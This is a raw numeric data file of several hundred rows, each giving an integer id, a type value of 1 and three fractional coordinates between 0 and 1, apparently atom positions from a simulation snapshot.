915 1 0.555217 0.000179435 0.936282
18 1 0.566157 0.0574414 0.999473
914 1 0.554772 0.0631903 0.879396
920 1 0.622796 0.0520015 0.936866
947 1 0.557753 0.112002 0.942524
949 1 0.618704 0.121559 0.881963
53 1 0.621488 0.12342 0.999314
923 1 0.81448 0.00346725 0.943919
918 1 0.689557 0.067372 0.873443
922 1 0.806945 0.0559852 0.881171
924 1 0.750383 0.0641593 0.938431
951 1 0.684907 0.111254 0.948361
953 1 0.748408 0.120975 0.869739
955 1 0.818732 0.115409 0.941632
897 1 0.99564 0.000667212 0.874335
925 1 0.882378 0.0030247 0.877454
926 1 0.945754 0.0665551 0.876951
928 1 0.881867 0.0599224 0.938075
957 1 0.880393 0.12767 0.875955
959 1 0.934487 0.127987 0.94782
930 1 0.0691058 0.193806 0.876275
936 1 0.12738 0.193739 0.941599
962 1 0.0612751 0.309793 0.877416
963 1 0.0657896 0.251527 0.940751
965 1 0.135118 0.250128 0.872485
968 1 0.133897 0.309368 0.934351
961 1 0.000968458 0.246137 0.880344
964 1 0.0005994 0.310432 0.941728
65 1 0.00625446 0.249008 0.999912
66 1 0.060373 0.311345 0.998664
42 1 0.312157 0.187783 0.995361
934 1 0.188828 0.183102 0.869915
938 1 0.305607 0.19726 0.876845
940 1 0.250092 0.19753 0.93661
966 1 0.187973 0.311414 0.868865
967 1 0.19433 0.255331 0.933841
969 1 0.243571 0.250497 0.871267
970 1 0.307712 0.312554 0.876334
971 1 0.312475 0.25396 0.946099
972 1 0.248611 0.312668 0.938412
70 1 0.184843 0.31044 0.997095
38 1 0.19642 0.181047 0.999136
78 1 0.437051 0.309789 0.997555
973 1 0.364853 0.25026 0.871449
944 1 0.375552 0.190308 0.927104
942 1 0.434757 0.185244 0.87061
976 1 0.368445 0.313169 0.933939
975 1 0.431901 0.249903 0.930762
974 1 0.428396 0.309201 0.876241
980 1 0.496028 0.30875 0.92984
948 1 0.499708 0.182457 0.939856
977 1 0.490724 0.246779 0.871567
77 1 0.372748 0.247825 0.997365
46 1 0.437888 0.193998 0.993139
81 1 0.503062 0.251655 0.997471
50 1 0.575688 0.189328 0.995369
85 1 0.632944 0.249769 0.995987
979 1 0.55524 0.246817 0.930807
981 1 0.62727 0.245657 0.880664
978 1 0.567346 0.30684 0.867227
984 1 0.624846 0.30791 0.936352
946 1 0.556056 0.183486 0.878612
952 1 0.637268 0.185947 0.935206
82 1 0.566391 0.305975 0.995522
86 1 0.684082 0.315988 0.995014
983 1 0.690242 0.246219 0.93294
954 1 0.80881 0.179819 0.88401
982 1 0.68289 0.313519 0.881353
986 1 0.816286 0.319758 0.881813
988 1 0.748055 0.311906 0.934952
950 1 0.689995 0.183515 0.87065
985 1 0.750251 0.245582 0.877467
987 1 0.812794 0.253733 0.939021
956 1 0.741299 0.175413 0.945861
89 1 0.745369 0.256281 0.99555
90 1 0.807598 0.315304 0.996842
932 1 0.999088 0.184568 0.937798
960 1 0.875951 0.189843 0.930117
991 1 0.940705 0.254942 0.941136
958 1 0.939258 0.194667 0.877338
992 1 0.879362 0.308598 0.946532
989 1 0.874271 0.26029 0.878486
990 1 0.944903 0.319625 0.877512
1923 1 0.0629493 0.498388 0.949693
995 1 0.0643745 0.367894 0.937658
1000 1 0.123494 0.435176 0.944016
997 1 0.123709 0.37618 0.885466
994 1 0.0522784 0.437886 0.882706
98 1 0.060169 0.431699 0.999102
1931 1 0.310373 0.499541 0.942233
1002 1 0.319497 0.435279 0.880218
1003 1 0.307242 0.377449 0.942893
1001 1 0.246309 0.382931 0.876187
998 1 0.173894 0.437356 0.877726
1004 1 0.249458 0.440587 0.941329
999 1 0.191593 0.378553 0.941222
1935 1 0.44196 0.491107 0.931039
1008 1 0.376621 0.437559 0.942794
1005 1 0.376253 0.376141 0.868145
110 1 0.435379 0.439735 0.999144
1006 1 0.434894 0.43876 0.866698
1007 1 0.432921 0.376281 0.928174
109 1 0.379448 0.370589 0.993874
1013 1 0.625886 0.377723 0.875556
1009 1 0.504922 0.373442 0.876519
1012 1 0.504505 0.438053 0.929542
1010 1 0.562949 0.441458 0.872225
1011 1 0.564553 0.37875 0.940062
1016 1 0.617203 0.438811 0.931463
1045 1 0.620271 0.498017 0.992266
121 1 0.740964 0.378555 0.996591
118 1 0.676781 0.433312 0.998123
122 1 0.812088 0.440898 0.998616
1017 1 0.747302 0.377329 0.877122
1015 1 0.681871 0.380474 0.937883
1018 1 0.806437 0.437115 0.87789
1020 1 0.744073 0.444109 0.947695
1014 1 0.688398 0.450115 0.88317
1019 1 0.810499 0.379521 0.947365
1947 1 0.820099 0.499061 0.935386
1024 1 0.88645 0.444743 0.940644
1023 1 0.939616 0.379793 0.945378
1022 1 0.936705 0.440042 0.874711
1021 1 0.877186 0.376375 0.889309
1921 1 0.994599 0.498257 0.874248
996 1 0.996757 0.445371 0.942683
993 1 0.996594 0.380287 0.878188
125 1 0.872365 0.379008 0.999838
1032 1 0.123337 0.560573 0.0693952
1059 1 0.0548818 0.624202 0.0654376
1154 1 0.0585238 0.558605 0.12532
1189 1 0.119351 0.629147 0.117175
1061 1 0.123379 0.624243 0.00540681
1029 1 0.134463 0.501693 0.00449949
1026 1 0.0559648 0.565729 0.009638
1036 1 0.250205 0.563731 0.0630249
1063 1 0.185957 0.619091 0.0628658
1067 1 0.307039 0.629187 0.0689701
1158 1 0.191133 0.558362 0.123051
1162 1 0.313135 0.565336 0.122048
1193 1 0.24994 0.627089 0.123658
1161 1 0.256975 0.505698 0.129468
1065 1 0.253662 0.624555 0.00137982
1030 1 0.18577 0.567409 0.00300649
1035 1 0.317182 0.500085 0.066397
1034 1 0.31109 0.554253 0.00710569
1033 1 0.242567 0.504977 0.0047797
1040 1 0.381745 0.555144 0.0614741
1071 1 0.435204 0.624965 0.0560759
1166 1 0.437069 0.558318 0.120723
1197 1 0.379136 0.627755 0.118923
1044 1 0.497001 0.558807 0.061636
1069 1 0.368525 0.617787 0.00365692
1038 1 0.4418 0.561101 0.00529595
1201 1 0.500693 0.624859 0.123562
1048 1 0.626564 0.565937 0.0585019
1075 1 0.563995 0.627535 0.0597615
1170 1 0.558846 0.561432 0.121288
1205 1 0.622577 0.635273 0.115532
1173 1 0.620589 0.503645 0.118793
1046 1 0.691165 0.559063 0.00376413
1052 1 0.754942 0.568985 0.0640089
1079 1 0.693955 0.625543 0.0581288
1083 1 0.816361 0.628913 0.0642424
1174 1 0.682121 0.560094 0.118394
1178 1 0.816008 0.57044 0.125643
1209 1 0.755295 0.630581 0.124361
1050 1 0.822138 0.567503 0.00767455
1049 1 0.757514 0.506516 0.000234039
1051 1 0.81748 0.503434 0.0642058
1028 1 0.988746 0.565196 0.0660308
1185 1 0.99394 0.620864 0.124848
1056 1 0.877103 0.559194 0.0600475
1087 1 0.934302 0.631304 0.0579823
1182 1 0.930649 0.562194 0.125349
1213 1 0.875025 0.620688 0.114715
1085 1 0.880228 0.629998 0.00311791
1025 1 0.992823 0.503793 0.00186612
1054 1 0.937423 0.565909 0.00549838
1057 1 0.994527 0.625972 0.00277323
1090 1 0.0647806 0.817089 0.00684543
1064 1 0.125945 0.688864 0.0629464
1091 1 0.0629295 0.752662 0.0743194
1096 1 0.118986 0.816714 0.0675398
1186 1 0.0604977 0.685292 0.122167
1218 1 0.0586507 0.816509 0.1247
1221 1 0.126137 0.742291 0.124969
1217 1 0.00392153 0.755838 0.127758
1092 1 0.00128865 0.818743 0.0616656
1093 1 0.122084 0.748164 0.00498665
1089 1 0.00847242 0.75096 0.00647201
1068 1 0.250774 0.68441 0.0592011
1095 1 0.187939 0.74992 0.0618228
1099 1 0.317774 0.750041 0.0519665
1100 1 0.255952 0.807776 0.0604752
1190 1 0.190856 0.690892 0.119849
1194 1 0.314123 0.684161 0.130358
1222 1 0.188209 0.812017 0.12775
1225 1 0.249998 0.750498 0.120827
1226 1 0.321948 0.817074 0.128608
1062 1 0.184251 0.687674 0.00291969
1072 1 0.36816 0.683176 0.0606539
1103 1 0.439643 0.743757 0.0644488
1104 1 0.383221 0.810068 0.061197
1198 1 0.443413 0.682231 0.118436
1229 1 0.375144 0.749471 0.118775
1230 1 0.447237 0.809305 0.122678
1108 1 0.496283 0.808364 0.0590627
1102 1 0.436705 0.809285 0.00175194
1233 1 0.502945 0.746539 0.119987
1076 1 0.502189 0.68263 0.0557975
1080 1 0.623132 0.694751 0.060107
1107 1 0.562579 0.750535 0.0553849
1112 1 0.63305 0.810515 0.0524618
1202 1 0.565281 0.695815 0.118993
1234 1 0.560725 0.815786 0.119899
1237 1 0.625272 0.762301 0.119921
1084 1 0.755246 0.685803 0.0590482
1111 1 0.694456 0.753428 0.0593082
1115 1 0.815872 0.7506 0.066954
1116 1 0.753734 0.810691 0.0594453
1206 1 0.690584 0.685912 0.117782
1210 1 0.818246 0.689925 0.121913
1238 1 0.688487 0.814942 0.123439
1241 1 0.748962 0.75308 0.121402
1242 1 0.820529 0.819188 0.119622
1082 1 0.817592 0.690674 0.00643256
1113 1 0.760993 0.748965 0.000950661
1078 1 0.684794 0.682301 0.00119638
1086 1 0.93881 0.694332 0.00638842
1060 1 0.997063 0.690469 0.0618444
1117 1 0.878951 0.750338 0.00249407
1088 1 0.879684 0.688094 0.0655788
1119 1 0.943897 0.749302 0.0646652
1120 1 0.879587 0.814392 0.0644169
1214 1 0.936081 0.676247 0.129615
1245 1 0.882225 0.751399 0.121672
1246 1 0.947709 0.816244 0.117453
1118 1 0.940068 0.812634 0.00438242
1123 1 0.0677413 0.878388 0.0655694
1128 1 0.125563 0.955178 0.057296
1250 1 0.0679797 0.940717 0.12179
1253 1 0.127527 0.876221 0.124827
1249 1 0.00150694 0.875059 0.127521
1124 1 0.00854869 0.941952 0.0641185
1125 1 0.129905 0.875415 0.00513504
1127 1 0.18624 0.875684 0.069364
1131 1 0.309683 0.871316 0.0538618
1132 1 0.250094 0.936736 0.0573411
1254 1 0.188725 0.940444 0.117676
1257 1 0.255306 0.869266 0.128162
1258 1 0.314723 0.937474 0.118079
11 1 0.316806 0.999613 0.0581834
1126 1 0.186984 0.942793 0.008099
1130 1 0.316275 0.93743 0.000744087
1135 1 0.438513 0.881371 0.0595115
1136 1 0.376366 0.935899 0.06036
1261 1 0.381772 0.875393 0.116078
1262 1 0.438994 0.937151 0.11687
1140 1 0.49879 0.938957 0.0653509
141 1 0.377434 0.993892 0.123186
1137 1 0.496306 0.87282 0.00644141
1265 1 0.505732 0.883797 0.129153
1139 1 0.567206 0.878607 0.0609333
1144 1 0.622589 0.935601 0.0677653
1266 1 0.563319 0.946433 0.125065
1269 1 0.625858 0.870015 0.128669
21 1 0.614138 0.995617 0.00961819
1141 1 0.622847 0.877817 0.0020733
23 1 0.676844 0.998508 0.0640805
153 1 0.748202 0.9955 0.129274
1143 1 0.695188 0.875476 0.0573997
1147 1 0.817315 0.880493 0.0615676
1148 1 0.746437 0.942606 0.0583016
1270 1 0.683664 0.937222 0.129664
1273 1 0.753847 0.872635 0.118503
1274 1 0.809046 0.936992 0.125758
27 1 0.819132 0.997511 0.0685613
31 1 0.940555 0.996699 0.0665835
1151 1 0.947481 0.88064 0.0694714
1152 1 0.881046 0.933152 0.068424
1277 1 0.877047 0.880449 0.13084
1278 1 0.937095 0.942219 0.128505
157 1 0.877427 0.99894 0.126564
1283 1 0.062645 0.507792 0.312086
1281 1 0.00119332 0.500831 0.252934
1160 1 0.125633 0.571902 0.177126
1187 1 0.062069 0.620007 0.178533
1282 1 0.067425 0.564089 0.247112
1288 1 0.127493 0.56189 0.310566
1315 1 0.0628223 0.625265 0.309546
1317 1 0.121509 0.625784 0.248347
1156 1 0.00129715 0.562967 0.189192
1155 1 0.0727329 0.507684 0.189997
1291 1 0.310965 0.505053 0.314607
1159 1 0.18801 0.504046 0.190245
1164 1 0.248402 0.566876 0.191218
1191 1 0.184548 0.626177 0.176827
1195 1 0.310226 0.621098 0.188592
1286 1 0.18882 0.56143 0.247181
1290 1 0.306301 0.555207 0.248351
1292 1 0.250118 0.569428 0.315245
1319 1 0.182921 0.623097 0.31689
1321 1 0.243073 0.628021 0.245438
1323 1 0.310669 0.631173 0.312782
1293 1 0.376398 0.501478 0.250292
1168 1 0.374456 0.557056 0.183423
1199 1 0.431745 0.619663 0.180828
1294 1 0.429403 0.565352 0.246034
1296 1 0.378594 0.566707 0.311529
1325 1 0.368455 0.618721 0.246048
1327 1 0.442721 0.623158 0.315511
1300 1 0.496183 0.556978 0.308737
1329 1 0.500988 0.618486 0.249717
1172 1 0.501155 0.566548 0.182292
1176 1 0.631566 0.567055 0.17925
1203 1 0.567414 0.622867 0.183454
1298 1 0.565781 0.561374 0.243871
1304 1 0.623582 0.562956 0.313042
1331 1 0.5585 0.627329 0.304127
1333 1 0.630399 0.624742 0.244752
1297 1 0.504477 0.500712 0.243518
1299 1 0.564996 0.504687 0.312796
1301 1 0.63012 0.503788 0.249582
1180 1 0.748115 0.561939 0.174537
1207 1 0.695007 0.629948 0.180143
1211 1 0.808476 0.625184 0.188917
1302 1 0.694001 0.559756 0.24344
1306 1 0.804969 0.559161 0.24614
1308 1 0.749068 0.566021 0.305594
1335 1 0.6888 0.629895 0.300414
1337 1 0.750272 0.624721 0.243703
1339 1 0.809607 0.624482 0.310355
1309 1 0.874782 0.500318 0.247434
1284 1 0.999815 0.558539 0.316464
1313 1 0.999068 0.623475 0.253647
1184 1 0.872906 0.562584 0.188929
1215 1 0.934197 0.621704 0.191057
1310 1 0.937004 0.557836 0.246734
1312 1 0.869935 0.558739 0.306619
1341 1 0.866283 0.625832 0.248973
1343 1 0.930625 0.623874 0.303976
1192 1 0.121315 0.682144 0.182397
1219 1 0.0658642 0.74876 0.181109
1224 1 0.123441 0.806822 0.185771
1314 1 0.067567 0.680242 0.244918
1320 1 0.121387 0.684503 0.315661
1346 1 0.0657647 0.811514 0.251259
1347 1 0.0682318 0.749577 0.310185
1349 1 0.128515 0.748702 0.245367
1352 1 0.129667 0.803321 0.30593
1316 1 0.00889064 0.691355 0.309281
1348 1 0.00553849 0.805411 0.308502
1188 1 0.00555038 0.683911 0.189657
1220 1 0.00562829 0.815705 0.187104
1345 1 0.00252701 0.749641 0.251122
1196 1 0.250136 0.680218 0.18203
1223 1 0.187319 0.742312 0.186541
1227 1 0.303428 0.746647 0.181104
1228 1 0.256744 0.817229 0.194669
1318 1 0.182045 0.684368 0.246889
1322 1 0.309717 0.690109 0.247699
1324 1 0.24817 0.679983 0.311438
1350 1 0.187132 0.808167 0.242536
1351 1 0.194924 0.749163 0.308212
1353 1 0.254505 0.757832 0.252958
1354 1 0.32317 0.817407 0.248386
1355 1 0.309241 0.749002 0.320474
1356 1 0.253366 0.812762 0.31526
1200 1 0.375827 0.686961 0.188402
1231 1 0.434284 0.740784 0.178755
1232 1 0.378772 0.809647 0.18903
1326 1 0.429806 0.676622 0.246093
1328 1 0.373572 0.681097 0.306275
1357 1 0.376078 0.745004 0.247799
1358 1 0.44257 0.804676 0.235684
1359 1 0.438002 0.742709 0.305655
1360 1 0.381418 0.803988 0.316611
1364 1 0.498394 0.808406 0.309765
1332 1 0.497658 0.686486 0.301762
1204 1 0.496164 0.688917 0.188828
1361 1 0.502942 0.750365 0.247656
1236 1 0.503074 0.814209 0.181765
1208 1 0.626205 0.69269 0.17999
1235 1 0.556636 0.749701 0.186022
1330 1 0.561246 0.691831 0.245483
1336 1 0.622818 0.689496 0.311197
1363 1 0.566052 0.7559 0.305096
1365 1 0.624614 0.74734 0.247743
1368 1 0.632085 0.809917 0.308462
1240 1 0.636376 0.805363 0.195089
1362 1 0.567843 0.812755 0.249564
1212 1 0.743782 0.698521 0.184747
1239 1 0.688726 0.750976 0.186648
1243 1 0.813274 0.749533 0.181944
1244 1 0.748021 0.812946 0.181916
1334 1 0.687421 0.696684 0.25018
1338 1 0.805068 0.682694 0.250297
1340 1 0.745689 0.687716 0.30379
1366 1 0.698684 0.807087 0.252646
1367 1 0.685216 0.747834 0.311093
1369 1 0.762617 0.754917 0.250067
1370 1 0.813176 0.813915 0.254681
1371 1 0.814587 0.750045 0.318213
1372 1 0.746236 0.816894 0.313889
1216 1 0.873006 0.688916 0.185072
1247 1 0.938975 0.753552 0.182833
1248 1 0.874625 0.812647 0.184601
1342 1 0.936253 0.688833 0.242172
1344 1 0.872415 0.689927 0.295685
1373 1 0.871555 0.752639 0.251582
1374 1 0.945465 0.809778 0.243781
1375 1 0.939825 0.740297 0.30529
1376 1 0.880744 0.815444 0.316206
1251 1 0.0629316 0.883502 0.182283
1256 1 0.129947 0.943632 0.18093
1378 1 0.0680711 0.935206 0.249306
1379 1 0.0621226 0.872506 0.310709
1381 1 0.12377 0.875542 0.243287
1384 1 0.130905 0.933322 0.313781
1377 1 0.00271139 0.879014 0.245199
261 1 0.129025 0.991171 0.256219
135 1 0.192878 0.996585 0.185668
1255 1 0.190273 0.877806 0.17825
1259 1 0.318247 0.877422 0.184444
1260 1 0.264307 0.939578 0.17786
1382 1 0.188791 0.933783 0.239815
1383 1 0.190964 0.870725 0.306764
1385 1 0.251604 0.875399 0.248981
1386 1 0.310184 0.938797 0.248039
1387 1 0.313521 0.873651 0.311153
1388 1 0.252573 0.932599 0.312081
265 1 0.246237 0.986803 0.249918
263 1 0.197394 0.996624 0.309041
1263 1 0.443416 0.879912 0.182599
1264 1 0.374795 0.936869 0.181855
1389 1 0.381421 0.872497 0.249555
1390 1 0.436095 0.931075 0.245667
1391 1 0.433585 0.866596 0.314556
1392 1 0.383266 0.933989 0.306872
1268 1 0.499071 0.938318 0.183986
1393 1 0.499808 0.869319 0.251289
271 1 0.441281 0.999322 0.315895
143 1 0.443972 0.997772 0.187541
275 1 0.569112 0.998609 0.312686
277 1 0.630301 0.997724 0.255982
1396 1 0.500789 0.94428 0.304847
1267 1 0.563561 0.869175 0.192149
1272 1 0.623925 0.935229 0.185471
1394 1 0.571528 0.940555 0.248058
1395 1 0.565749 0.878778 0.308217
1397 1 0.628691 0.86774 0.247956
1400 1 0.630768 0.932615 0.316241
1271 1 0.685567 0.874085 0.188878
1275 1 0.81288 0.880242 0.190026
1276 1 0.742468 0.935408 0.190044
1398 1 0.69 0.936625 0.261557
1399 1 0.686085 0.872537 0.312539
1401 1 0.755178 0.875745 0.253877
1402 1 0.804275 0.937611 0.258994
1403 1 0.815481 0.87646 0.322073
1404 1 0.748483 0.941403 0.321674
1380 1 0.992871 0.935847 0.309239
1252 1 0.99976 0.938809 0.191236
1279 1 0.932064 0.869675 0.192263
1280 1 0.866105 0.936473 0.196878
1405 1 0.879528 0.871521 0.252609
1406 1 0.931259 0.937522 0.252014
1407 1 0.945321 0.871211 0.310519
1408 1 0.870071 0.940235 0.311838
1411 1 0.0554653 0.5025 0.443998
1413 1 0.12576 0.505361 0.374534
1410 1 0.057914 0.565158 0.384669
1416 1 0.124348 0.556287 0.440408
1443 1 0.0596079 0.630921 0.439129
1445 1 0.121513 0.624217 0.378413
1412 1 0.00306583 0.564244 0.442132
1538 1 0.0622683 0.572828 0.494632
1441 1 0.00255037 0.623518 0.370752
1573 1 0.131707 0.618626 0.496666
1417 1 0.255329 0.502375 0.371064
1449 1 0.250743 0.622499 0.373701
1451 1 0.306974 0.62328 0.441374
1420 1 0.245607 0.55697 0.433311
1447 1 0.192644 0.621207 0.437126
1414 1 0.189204 0.558252 0.373546
1418 1 0.312037 0.561892 0.378326
1415 1 0.187586 0.500534 0.438394
1546 1 0.310912 0.563565 0.497547
1423 1 0.442588 0.503032 0.441072
1421 1 0.378256 0.503607 0.369805
1581 1 0.372608 0.619 0.490808
1550 1 0.437702 0.559319 0.498891
1422 1 0.44423 0.559474 0.377783
1455 1 0.440558 0.623515 0.440004
1424 1 0.374968 0.561825 0.436399
1453 1 0.37836 0.622076 0.377875
1585 1 0.494005 0.623079 0.49968
1425 1 0.503399 0.502466 0.373554
1428 1 0.505261 0.562077 0.444596
1457 1 0.502611 0.617591 0.378046
1461 1 0.626716 0.625587 0.365975
1426 1 0.56657 0.555145 0.383209
1432 1 0.627727 0.561702 0.443909
1459 1 0.569385 0.62493 0.432676
1429 1 0.630111 0.501032 0.376533
1435 1 0.811004 0.507789 0.441036
1590 1 0.680059 0.664201 0.492166
1430 1 0.687126 0.566108 0.367509
1463 1 0.685381 0.623455 0.426036
1436 1 0.746217 0.555463 0.439463
1434 1 0.811435 0.565633 0.369177
1465 1 0.745865 0.624908 0.369557
1467 1 0.808891 0.622248 0.433172
1562 1 0.809755 0.567073 0.4958
1593 1 0.748606 0.62637 0.496593
1437 1 0.881821 0.508052 0.378138
1439 1 0.933556 0.505516 0.446432
1440 1 0.877457 0.572314 0.440259
1469 1 0.870947 0.635785 0.363719
1471 1 0.942682 0.622367 0.437492
1438 1 0.932776 0.576708 0.369848
1602 1 0.0665041 0.814699 0.497904
1480 1 0.121618 0.820358 0.438743
1477 1 0.128411 0.749664 0.374391
1442 1 0.0615653 0.68764 0.377119
1475 1 0.0642824 0.744337 0.438189
1448 1 0.128259 0.686715 0.443631
1474 1 0.0615422 0.823333 0.371228
1476 1 0.0057104 0.815158 0.442266
1473 1 0.00909688 0.751311 0.368636
1609 1 0.239927 0.748911 0.497697
1482 1 0.309355 0.807271 0.373507
1478 1 0.187462 0.819582 0.365618
1484 1 0.250812 0.817016 0.43772
1479 1 0.187238 0.752099 0.439291
1452 1 0.243464 0.688668 0.439954
1481 1 0.241248 0.75322 0.38629
1450 1 0.302461 0.691466 0.379904
1446 1 0.186081 0.683287 0.374191
1483 1 0.310059 0.748857 0.441749
1578 1 0.314095 0.681443 0.496152
1613 1 0.369102 0.744865 0.496484
1614 1 0.434518 0.813058 0.493987
1488 1 0.373143 0.812348 0.430071
1487 1 0.436061 0.737935 0.44268
1454 1 0.432242 0.684247 0.375743
1456 1 0.36648 0.682421 0.431675
1486 1 0.441088 0.808763 0.377365
1485 1 0.374263 0.74516 0.373837
1489 1 0.497436 0.745385 0.373701
1617 1 0.498596 0.748594 0.497043
1621 1 0.640303 0.746537 0.496996
1492 1 0.502427 0.807847 0.436257
1460 1 0.502814 0.677287 0.440215
1490 1 0.554542 0.810929 0.371185
1458 1 0.556962 0.68768 0.374916
1464 1 0.623086 0.689771 0.435457
1493 1 0.625082 0.750963 0.377121
1496 1 0.629568 0.809101 0.441104
1491 1 0.576186 0.748488 0.439619
1626 1 0.806915 0.819438 0.493199
1466 1 0.805691 0.681642 0.372171
1497 1 0.748231 0.747585 0.373
1498 1 0.82431 0.808521 0.377481
1495 1 0.688266 0.736482 0.434952
1499 1 0.809361 0.752132 0.439567
1462 1 0.679322 0.687345 0.368053
1468 1 0.748332 0.686705 0.436848
1500 1 0.746469 0.81479 0.431738
1494 1 0.683871 0.805598 0.381416
1622 1 0.693895 0.8108 0.498953
1444 1 0.996368 0.687442 0.438677
1629 1 0.868257 0.754915 0.496523
1501 1 0.884665 0.745234 0.370901
1504 1 0.875833 0.813402 0.440608
1502 1 0.94833 0.803593 0.373288
1470 1 0.943407 0.681572 0.370515
1472 1 0.882858 0.687956 0.441179
1503 1 0.940278 0.755686 0.438066
1637 1 0.121278 0.876871 0.49736
1634 1 0.0611565 0.939256 0.493272
385 1 0.00104268 0.9999 0.373703
389 1 0.126037 0.998054 0.371823
1506 1 0.0637327 0.942364 0.365029
1512 1 0.125257 0.941605 0.435469
1509 1 0.121765 0.876383 0.366645
1507 1 0.066598 0.884364 0.431216
1505 1 0.00115062 0.882692 0.372172
387 1 0.0689596 0.999496 0.438848
393 1 0.252246 0.999615 0.376489
391 1 0.196008 0.990443 0.43458
1516 1 0.263853 0.942546 0.436543
1511 1 0.187267 0.87515 0.428823
1513 1 0.252081 0.87568 0.372816
1515 1 0.318 0.88283 0.432063
1510 1 0.182287 0.931079 0.370886
1514 1 0.313257 0.942809 0.364878
521 1 0.26367 0.999715 0.494697
1641 1 0.254124 0.875067 0.496374
1638 1 0.185991 0.927032 0.497565
397 1 0.374869 0.998446 0.374766
1645 1 0.376261 0.873734 0.498182
1520 1 0.381843 0.934223 0.429925
1517 1 0.375263 0.867918 0.370586
1518 1 0.439026 0.937452 0.372089
1519 1 0.43683 0.872705 0.430627
399 1 0.446287 0.99637 0.437713
1646 1 0.43779 0.935337 0.494418
1649 1 0.503611 0.871541 0.49853
1523 1 0.56444 0.867779 0.435626
1525 1 0.623305 0.873466 0.376082
1528 1 0.622426 0.951184 0.439184
1650 1 0.566145 0.9279 0.497763
1521 1 0.500136 0.877009 0.36735
1522 1 0.557975 0.94399 0.378393
1524 1 0.501299 0.933146 0.439355
1653 1 0.620158 0.870916 0.495947
1654 1 0.679652 0.936545 0.49318
1529 1 0.747505 0.873558 0.374525
1532 1 0.749341 0.938255 0.436435
407 1 0.691863 0.999959 0.440626
1527 1 0.682407 0.879056 0.434397
1526 1 0.688684 0.938746 0.373565
1530 1 0.817367 0.940357 0.373027
1531 1 0.811776 0.875856 0.431446
411 1 0.80639 0.994811 0.442933
1657 1 0.750036 0.875606 0.497199
413 1 0.875476 0.998306 0.373839
1533 1 0.880145 0.87657 0.376295
1534 1 0.93864 0.942672 0.376262
1535 1 0.938028 0.867609 0.441721
1536 1 0.877031 0.928474 0.442575
1508 1 0.996913 0.939686 0.438
541 1 0.867608 0.998251 0.498125
1544 1 0.119034 0.558835 0.558959
1571 1 0.0622497 0.624514 0.555996
1666 1 0.0623058 0.561177 0.623441
1701 1 0.119241 0.626076 0.624157
1669 1 0.118194 0.50082 0.621859
1539 1 0.0564996 0.501978 0.563569
1569 1 0.00100256 0.628324 0.500892
1548 1 0.249173 0.556247 0.563001
1575 1 0.187547 0.618584 0.57098
1579 1 0.325862 0.622661 0.556394
1670 1 0.176815 0.562281 0.631317
1674 1 0.310627 0.566355 0.620664
1705 1 0.25216 0.623421 0.635799
1577 1 0.246053 0.618743 0.503303
1673 1 0.251988 0.5052 0.629215
1543 1 0.184152 0.500821 0.574027
1542 1 0.189115 0.559321 0.501209
1552 1 0.381908 0.558366 0.570188
1583 1 0.439386 0.632372 0.568168
1678 1 0.437038 0.558483 0.632116
1709 1 0.373042 0.629 0.626758
1556 1 0.496682 0.558214 0.557535
1713 1 0.498145 0.627534 0.633548
1681 1 0.499543 0.50003 0.635116
1560 1 0.614556 0.556281 0.566657
1587 1 0.559893 0.631758 0.560061
1682 1 0.555905 0.567391 0.621158
1717 1 0.62741 0.617741 0.626296
1589 1 0.617261 0.616516 0.50318
1554 1 0.562074 0.556583 0.501442
1563 1 0.811225 0.508185 0.560117
1564 1 0.747734 0.561416 0.568511
1591 1 0.678531 0.617738 0.560444
1595 1 0.810336 0.625436 0.566117
1686 1 0.688642 0.55909 0.637881
1690 1 0.813954 0.561745 0.618414
1721 1 0.747103 0.624709 0.631495
1689 1 0.755999 0.5052 0.629425
1558 1 0.689747 0.555419 0.505059
1693 1 0.872997 0.501304 0.61738
1697 1 0.992815 0.625613 0.634273
1540 1 0.997993 0.566601 0.558286
1568 1 0.87479 0.566887 0.560951
1599 1 0.93999 0.629393 0.566069
1694 1 0.932354 0.56247 0.624228
1725 1 0.88093 0.626316 0.620311
1597 1 0.875068 0.632727 0.50623
1567 1 0.930587 0.504879 0.555144
1537 1 0.996044 0.503128 0.502183
1665 1 0.995877 0.503905 0.6222
1565 1 0.872761 0.506204 0.501038
1566 1 0.93836 0.568262 0.504545
1570 1 0.0641096 0.689474 0.504569
1605 1 0.128333 0.755729 0.504609
1576 1 0.123313 0.688005 0.561624
1603 1 0.0637295 0.754081 0.565347
1608 1 0.119373 0.817291 0.560459
1698 1 0.0558616 0.687858 0.621818
1730 1 0.0653288 0.815964 0.630712
1733 1 0.123736 0.754145 0.624311
1729 1 0.00517334 0.753756 0.630001
1572 1 0.000624174 0.686709 0.563886
1601 1 0.000998443 0.743621 0.500798
1580 1 0.252475 0.679551 0.566297
1607 1 0.186525 0.753887 0.572127
1611 1 0.311721 0.744349 0.560013
1612 1 0.249538 0.811428 0.557614
1702 1 0.190241 0.684821 0.62826
1706 1 0.310456 0.680721 0.627007
1734 1 0.183218 0.820738 0.627
1737 1 0.256088 0.74138 0.624233
1738 1 0.308336 0.813387 0.621994
1574 1 0.185285 0.683019 0.503614
1606 1 0.182582 0.817984 0.500264
1610 1 0.312026 0.810989 0.501657
1584 1 0.374085 0.689632 0.558912
1615 1 0.437456 0.746392 0.564988
1616 1 0.374605 0.80291 0.556984
1710 1 0.433157 0.68523 0.630239
1741 1 0.373031 0.745513 0.626219
1742 1 0.430077 0.808817 0.626754
1620 1 0.499628 0.813417 0.56158
1745 1 0.495118 0.748997 0.623059
1582 1 0.436609 0.686037 0.505048
1586 1 0.560263 0.689836 0.500605
1588 1 0.502896 0.689405 0.560717
1592 1 0.623943 0.680723 0.556968
1619 1 0.562727 0.753175 0.56814
1624 1 0.627815 0.805504 0.561308
1714 1 0.561984 0.687005 0.617026
1746 1 0.579373 0.813032 0.629986
1749 1 0.622096 0.747815 0.624301
1618 1 0.566936 0.805463 0.5003
1596 1 0.752166 0.67996 0.562281
1623 1 0.693012 0.747008 0.57195
1627 1 0.81554 0.751219 0.562735
1628 1 0.750553 0.807019 0.559189
1718 1 0.684203 0.682665 0.624207
1722 1 0.819246 0.686438 0.621419
1750 1 0.673784 0.812397 0.625214
1753 1 0.753367 0.7511 0.626049
1754 1 0.813362 0.815413 0.627734
1594 1 0.806022 0.68406 0.500437
1625 1 0.75078 0.750653 0.506146
1604 1 0.995347 0.811066 0.569382
1600 1 0.880317 0.694439 0.562016
1631 1 0.938456 0.750143 0.563102
1632 1 0.881275 0.808861 0.564992
1726 1 0.941066 0.697449 0.62793
1757 1 0.87879 0.752309 0.634008
1758 1 0.937595 0.806078 0.628623
1630 1 0.934778 0.80325 0.502442
1598 1 0.939184 0.69032 0.50195
